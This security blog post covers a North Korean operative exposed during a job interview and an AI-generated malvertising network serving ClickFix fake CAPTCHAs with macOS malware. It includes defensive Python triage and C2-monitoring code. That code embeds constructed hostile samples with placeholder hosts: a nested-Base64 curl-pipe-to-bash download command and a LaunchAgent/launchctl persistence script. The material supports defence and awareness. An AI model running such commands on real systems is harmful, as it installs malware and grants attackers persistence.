Interview with the Chollima VIII
North Koreans, Malvertising and AI generated Fake News
Since our last article, a lot has happened.
Some things are new; others closely resemble what we have experienced before. Among the latter, there is a constant that has become something of a habit.
One that is too weird to fully get used to, yet too rare to simply let become routine.
Of course, I’m talking about North Koreans. We just had a new encounter with a Lazarus boy who wanted to join the Bitso ranks, and we’ll speak about it below.
As for the new things, we have two announcements. First, we just discovered a weird, fully AI-powered campaign that promotes all kinds of malicious content through domains resembling popular crypto exchanges (which we'll also discuss today).
Second, we will soon speak at two major conferences in Mexico 🇲🇽 and Colombia 🇨🇴 about our work interviewing Lazarus agents. We'll post the dates once the official announcements are made for each event.
In the meantime, enjoy this post about North Koreans, malware, and AI-powered malicious content networks.
Interview with the Chollima Extended Edition
As always, it all started with a candidate wanting to join Bitso as an engineer. The usual story: you are good at coding, we like people who are good at coding, so we set up an interview to get to know each other and be good at coding together.
But then reality hits: the candidate is not who he claims to be.
And once again, we find ourselves stuck in a call with a Chollima.
Or rather, he is stuck in a call with Sofía, our Talent Acquisition Specialist, who knows exactly what is going on and is fully prepared to catch him on tape and expose his fake identity.
The interview goes as expected, with him claiming to be named Camilo Andrés Pantoja from Colombia. He even reaffirms his nationality when asked.
Sofía quickly moves on to asking him to perform a few simple tasks and switches to Spanish. So far, the same old tricks (from both sides).
But then, something new happens. Watch the video and see if you can spot it:
Sofía shares with him a link to a Canary Token, a defensive measure: a link that, when visited, reveals information about the visitor, such as their browser and IP address.
Normally, these actors hide their origin IP behind a VPS (cloud instance) or a VPN such as AstrillVPN, or bounce through residential proxies. In this case, however, what we discovered was… interesting.
Our dear Camilo joined the call using a residential internet connection from Bogotá, Colombia.
This could mean one of two things.
Either Camilo is using a residential proxy, although multiple intelligence platforms label this IP address as domestic, non-VPN, non-VPS/hosting and non-proxy (at least for now).
Or Camilo has someone in Colombia helping him land the job and providing a vantage point on a local network. In other words, an in-country facilitator: one of those people who lend a laptop to a Lazarus operative so he can join interviews over AnyDesk while "working remotely".
This may sound grim, but it is something your Security and People teams should absolutely prepare for: a frontman either conducting an interview on behalf of a Lazarus agent or lending them the infrastructure for a fraudulent job application.
Also, did you notice how he never looks directly at the camera and instead seems focused on something off to the side of his desk? That is probably because they use live AI-assisted tools to answer questions during interviews. Creepy, isn’t it?
But let’s take a break. The internet is not just a bunch of bad guys trying to rob you. There are robots trying to do it too.
And they said AI wouldn’t take anyone’s job…
Malware Dadaism
In Van Doesburg’s words, “Dada is yes-no, a bird on four legs, a ladder without steps, a square without angles”. Dadaism was anything but art; anti-art, let’s say.
If I had to define this malicious campaign in words, I would say it is anything but malware as we know it: “anti-malware”, the term’s usual meaning notwithstanding.
If I had to define it with a picture, it would be Tatlin at Home, or Cut with the Kitchen Knife […]. Please, take a moment to look at them.
See? This is exactly how it feels to disassemble and reverse engineer this campaign, it’s just too much happening everywhere at the same time.
It all started with an alert from our Brand Protection provider, who found a recently registered domain impersonating our brand. But far from being yet another copycat or fake support website, visiting it would redirect visitors at random to all kinds of content unrelated to us. And I mean anything (take another look at those paintings while we are here): fake CAPTCHAs that were actually ClickFix lures, fake news outlets with AI-generated headlines and pictures, and even YouTube and Spotify channels featuring AI-generated content ranging from music and “radio streams” to philosophy and short stories.
A whole clanker network dedicated to distributing the most random things ever found on the internet, none of it actually related to our brand.
Every click would send you on a mystery trip through a different set of redirectors, questionable ad networks, and mirrors before eventually landing somewhere completely unknown and bizarre.
We should have stopped there and simply requested a takedown, but the chance of finding new malware made it worth digging further. So we called this thing “AI-dvertiser” and added it to our bestiary.

First thing we noticed: the visitor’s IP address and geolocation had no visible effect on what the domain served, so, weirdly enough, it is safe to assume every piece of content had roughly the same chance of being offered to the user.
Of course, since our interest lies in malware, we paid special attention to the ClickFix landing pages in all their variants. As mentioned, their chance of appearing was completely random, with the same probability of being served as the music channels.
So we spent quite some time hunting them down; at least we had something to listen to in the process.
We managed to identify four different templates impersonating CAPTCHAs from Cloudflare, Google reCAPTCHA, and Sift.
Most of them correctly identified the victim’s operating system, delivering, in my case, a macOS payload which, despite differences in encoding, contained virtually the same malicious content once decoded (which we’ll analyze in a minute).
Only one of them, posing as Google reCAPTCHA, failed to fingerprint my system and consistently delivered a PowerShell variant intended for Windows, which of course would not work on my setup.
So let’s take a look at what these misunderstood malware artists are up to.
The first three samples we recovered were not really different malware families, but rather different masks for the same delivery chain: Base64 wrapped around more Base64, paired with curl, bash, osascript, LaunchAgents and disposable domains, all glued together into a barely coherent mess.
The infection flow itself is surprisingly simple. The victim solves a fake CAPTCHA and is instructed to paste a Base64-encoded command into their terminal. That command downloads a remote shell script using curl, pipes it directly into bash, and from there the malware pivots into osascript, Apple’s native utility for executing AppleScript code.
The AppleScript stage creates persistence through launchctl and macOS LaunchAgents, effectively turning legitimate operating system utilities into the malware’s entire deployment stack.
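The chain above is easy to triage once you stop running what the page tells you to paste and decode it instead. The following is an added example, not the campaign's sample nor code from the original post: it peels nested Base64 layers out of a pasted ClickFix command, then flags the pieces the post lists (curl, pipe-to-shell, osascript, launchctl/LaunchAgents, URLs). The pasted command and the "stage script" are constructed to mirror the described chain; the `.invalid` domains and the `examplechannel` name are placeholders.

```python
import base64
import binascii
import re

# Constructed samples that mimic the chain described above (Base64 inside Base64 decoding to
# curl | bash, then a stage that pivots to osascript and LaunchAgents). NOT the real samples.
INNER_CMD = "curl -fsSL https://stage.example.invalid/s.sh | bash"
MIDDLE_CMD = "echo " + base64.b64encode(INNER_CMD.encode()).decode() + " | base64 -d | bash"
PASTED_COMMAND = "echo " + base64.b64encode(MIDDLE_CMD.encode()).decode() + " | base64 -d | sh"

STAGE_SCRIPT = """#!/bin/bash
osascript -e 'do shell script "mkdir -p ~/Library/LaunchAgents"'
printf '<plist><dict><key>Label</key><string>com.example.helper</string></dict></plist>' > ~/Library/LaunchAgents/com.example.helper.plist
launchctl load ~/Library/LaunchAgents/com.example.helper.plist
curl -s https://t.me/s/examplechannel -o /tmp/.c2
"""

B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
URL_RE = re.compile(r"https?://[^\s'\"<>|]+")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z)?sh\b")
LOLBINS = ("curl", "wget", "bash", "osascript", "launchctl", "LaunchAgents", "base64", "plutil")


def try_decode(token):
    """Return the token decoded as printable UTF-8 text, or None if it is not Base64 text."""
    try:
        text = base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None
    if not text or not all(ch.isprintable() or ch in "\n\r\t" for ch in text):
        return None
    return text


def peel_base64(blob, max_depth=8):
    """Walk down nested Base64 layers; returns the decoded layers, outermost first."""
    layers, current = [], blob
    for _ in range(max_depth):
        decoded = None
        for match in B64_TOKEN.finditer(current):
            decoded = try_decode(match.group(0))
            if decoded:
                break
        if decoded is None:
            break
        layers.append(decoded)
        current = decoded
    return layers


def extract_indicators(text):
    """Pull URLs and the living-off-the-land utilities the chain relies on."""
    lolbins = {
        name for name in LOLBINS
        if re.search(rf"(?<![\w.-]){re.escape(name)}(?![\w-])", text)
    }
    return {
        "urls": sorted(set(URL_RE.findall(text))),
        "lolbins": lolbins,
        "pipes_to_shell": bool(PIPE_TO_SHELL.search(text)),
        "persistence": bool(lolbins & {"launchctl", "LaunchAgents"}),
    }


def triage(pasted_command, stage_script=None):
    """Decode what the victim was told to paste (plus the fetched stage, if you have it) and summarise."""
    layers = peel_base64(pasted_command)
    corpus = "\n".join([pasted_command, *layers, stage_script or ""])
    report = extract_indicators(corpus)
    report["layers"] = len(layers)
    report["verdict"] = "likely ClickFix" if report["pipes_to_shell"] and report["urls"] else "inconclusive"
    return report


if __name__ == "__main__":
    for key, value in triage(PASTED_COMMAND, STAGE_SCRIPT).items():
        print(f"{key:>15}: {value}")
```

Decoding stops at the first layer that is no longer Base64 text, so the deepest layer is the actual curl-pipe-bash command, and the URLs it yields are what you submit for takedown and blocking rather than the throwaway domain the lure was hosted on.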
But the weirdest part by far was the command and control infrastructure.
The malware periodically visits a public Telegram channel and reads its title. Literally the title. Whatever domain is written there becomes the active C2 endpoint.
So whenever one of their domains gets taken down, the operators simply rename the Telegram channel. Infected hosts revisit the page, read the new title and continue beaconing to the updated infrastructure.
It is absurdly improvised, yet somehow works.
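The dead-drop resolver is simple enough to emulate for monitoring: poll the public channel page, read the title, and alert whenever it turns into a new hostname. The block below is an added example, not the implant's code nor anything from the original post. It assumes that the public preview page carries the channel title in an og:title meta tag; the HTML snapshots, the channel name and the `.invalid` hostnames are constructed for the example.

```python
import re
from html.parser import HTMLParser

# Constructed snapshots of a public channel preview page. The channel and the hostnames in
# the og:title tag are made up; only the mechanism (title == C2 host) mirrors the post.
SNAPSHOT_V1 = """<html><head>
<meta property="og:title" content="cdn-update.example.invalid">
<meta property="og:description" content="Telegram channel">
<title>Telegram: Contact @examplechannel</title></head><body></body></html>"""
SNAPSHOT_V2 = SNAPSHOT_V1.replace("cdn-update.example.invalid", "cdn-update2.example.invalid")
SNAPSHOT_NOISE = SNAPSHOT_V1.replace("cdn-update.example.invalid", "Crypto News Daily")

HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$"
)


class _OgTitle(HTMLParser):
    """Pulls the first og:title meta tag out of a page, which is all the implant reads."""

    def __init__(self):
        super().__init__()
        self.title = None

    def handle_starttag(self, tag, attrs):
        if tag == "meta" and self.title is None:
            attr = dict(attrs)
            if attr.get("property") == "og:title":
                self.title = attr.get("content")


def channel_title(page_html):
    parser = _OgTitle()
    parser.feed(page_html)
    return parser.title


def resolve_c2(page_html):
    """Mimic the implant: the channel title is the C2 host, but only if it is a plausible hostname."""
    title = channel_title(page_html)
    if title is None:
        return None
    candidate = title.strip().lower().rstrip(".")
    return candidate if HOSTNAME_RE.match(candidate) else None


def watch_channel(snapshots, known=None):
    """Defender-side loop: feed successive page snapshots, emit an event each time the host rotates."""
    events, current = [], known
    for index, page_html in enumerate(snapshots):
        host = resolve_c2(page_html)
        if host and host != current:
            events.append({"poll": index, "old": current, "new": host})
            current = host
    return events


if __name__ == "__main__":
    for event in watch_channel([SNAPSHOT_V1, SNAPSHOT_V1, SNAPSHOT_NOISE, SNAPSHOT_V2]):
        print(event)
```

A title that is not a hostname (the "Crypto News Daily" snapshot) is ignored rather than treated as a rotation, which is also how an infected host would behave if the operators park the channel under a decoy name between domains; each emitted event is a new domain to block before the infected hosts pick it up.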
Even more curious, the malware does not seem particularly interested in immediately exploiting the victim. After infection, it establishes persistence, registers the host, resolves the active C2 and mostly just sits there waiting.
At least from what we observed, the operation feels much more manual than automated, almost like the operators are collecting shells first and deciding what to do with them later.
The Windows variant follows the same spirit, but that’s a story for another day, as this post is already getting too long.
As of today, you can find the samples on MalwareBazaar if you want to poke them with a stick without having to walk through the same LLM-fertilized jungle we did.
And believe me, you do not want to.
As usual, stay safe,
get yourself a good Brand Protection service,
do not paste random commands into your terminal just because a website tells you to,
don’t weaponize clankers,
and don’t get rekt.